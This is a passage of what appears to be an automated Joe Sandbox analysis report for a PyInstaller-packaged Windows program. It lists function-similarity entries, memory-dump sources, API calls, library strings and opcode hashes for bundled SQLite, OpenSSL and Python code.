• Instruction Fuzzy Hash: BF118E22E0D66341F9696B7E485117E12924F46B32F084B74DB7ECAEF3DD2DB8848301
APIs
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFE01389F87,?,00000007,?), ref: 00007FFE01389917
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: %.*z:%u$column%d$rowid
• API String ID: 4225454184-2903559916
• Opcode ID: c8e9e9d0493b56702fc431c37cfc446078fd1101c4b736dc5a6e1eecc87d744d
• Instruction ID: fa96f5bcb70cc9619ae51e05ecc22615c34c238de490e23d32b4f45f52ece4e5
• Opcode Fuzzy Hash: c8e9e9d0493b56702fc431c37cfc446078fd1101c4b736dc5a6e1eecc87d744d
• Instruction Fuzzy Hash: 37B19C22A1978285FF669B1594503BE6BA0EF85B98F4A4139DE5E0F7E5DF3CE805C300
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction ID: f99eb74c11320d08b98c2a526d1315dc3e9ffcb2f44da47dced1f32cc0a6ef2f
• Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction Fuzzy Hash: AF91BC23A0CA6681FB618F28D45037E37A1EB40B96F854136DB5E83BE6DF3DE8458341
APIs
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE01398739
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE013987BB
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE013988AD
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: RETURNING may not use "TABLE.*" wildcards
• API String ID: 4225454184-2313493979
• Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
• Instruction ID: 74143dca9fb6ba3e254ad7b714f955f2d08801a91e535287899ccff2ee439e9c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84B18022A08B8586E720CF15D4402A97BA1FB96BE4F068375DEAD0B7E5DF3CE195C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D52A
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D554
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D5A7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 4225454184-2852464175
                                                                                                                                                                                                                                              • Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                              • Instruction ID: 44d90c02aedbc3b2e68c0eeb502d725a2ade8b52cbc61981a3cd81087135fa23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1391BD72B1964187EB248E55A04077A77A0FBA4BA4F564635DFAD0BBE8CF3CF4408B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 3fc33de8bb598934345648d721c902761075629d5de7b4a27321690c4a03c39b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281D473E0E66385FBA49F2DC95027836A0AB11B4AF558535CB0AD7AF5CF2DED029301
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 0-1505470444
                                                                                                                                                                                                                                              • Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                              • Instruction ID: c2b7d12cfdd951f47a4b4b3f80096df34a2817c6fba12d64b491535a5cba8940
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12918722A09B8285EB20DB15D4443BE67A4FB89BB8F464336DAAD4B7E5DF3CD441C300
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                              • Instruction ID: f16ee2ca609366ee503a9389fc2aae530acb25968bb2cea18c858a21eccf3415
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED811A72B086D18AEB649B25D1806BEBBE0FB50B84F064176DB8E4B661CF3CE455C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
• API String ID: 3568877910-2527649602
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007A461250
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
• API String ID: 909805961-4157686371
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: out of memory$string or blob too big
• API String ID: 4225454184-2410398255
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                              • API String ID: 4225454184-2916047017
                                                                                                                                                                                                                                              • Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                              • Instruction ID: 3172d41a05741d463bc46c4202d3170ff758164c5e920864c888d59cc0cec051
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42510272F1864281EB62CA65D06473927E1FB04BA0F4746B9CA3D0B3F9DF2DE8418740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007B6570
                                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                              • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                              • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                              • Instruction ID: 70d793f23d9f32deca3c5870d7907b8680c0c05067fd366b68621030ac627b06
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD414572F2C74286EB28AF18E414A697751EB81B90F444630EAAF47BDDDF3DE4058B40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                              • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                              • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                              • Instruction ID: 8b6517fbce4d300748b82099fa9ab081dd25f3e367956e5cb44124db3375aba6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A411221A0BA8384FE54BF59955077822A1BF82F84F1D4536EF5D4B7AEDF3CA8128310
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6B750352C,?,00000000,00007FF6B7503F23), ref: 00007FF6B7507F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction ID: 2d830b80e12cbc9dbe8d8da00474cc222322cf14f104e082e1db06b220a04172
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131E66271DAC145EA218B28E4503EA6358EF84BE8F440631EF6D877E9DF3CD6458700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction ID: 0951eebf42bbb2f49d1416f930d09a427540ecae0a2d2a0830ecf9075305326d
• Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction Fuzzy Hash: F921AE63B0CB8182E7219B58F8447EA63A4FB88784F400136EF8D97669EE3CE245C740
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
• Instruction ID: 44dc6140cc07823e08c36d7133b7fb63651f8aa41e4be9516083f75f5c8f87c4
• Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
• Instruction Fuzzy Hash: AAD1E073B0CA918AE711CF6AC4402AC37A1FB55799B444226DF4E97FE9EE39E046C300
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D107
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
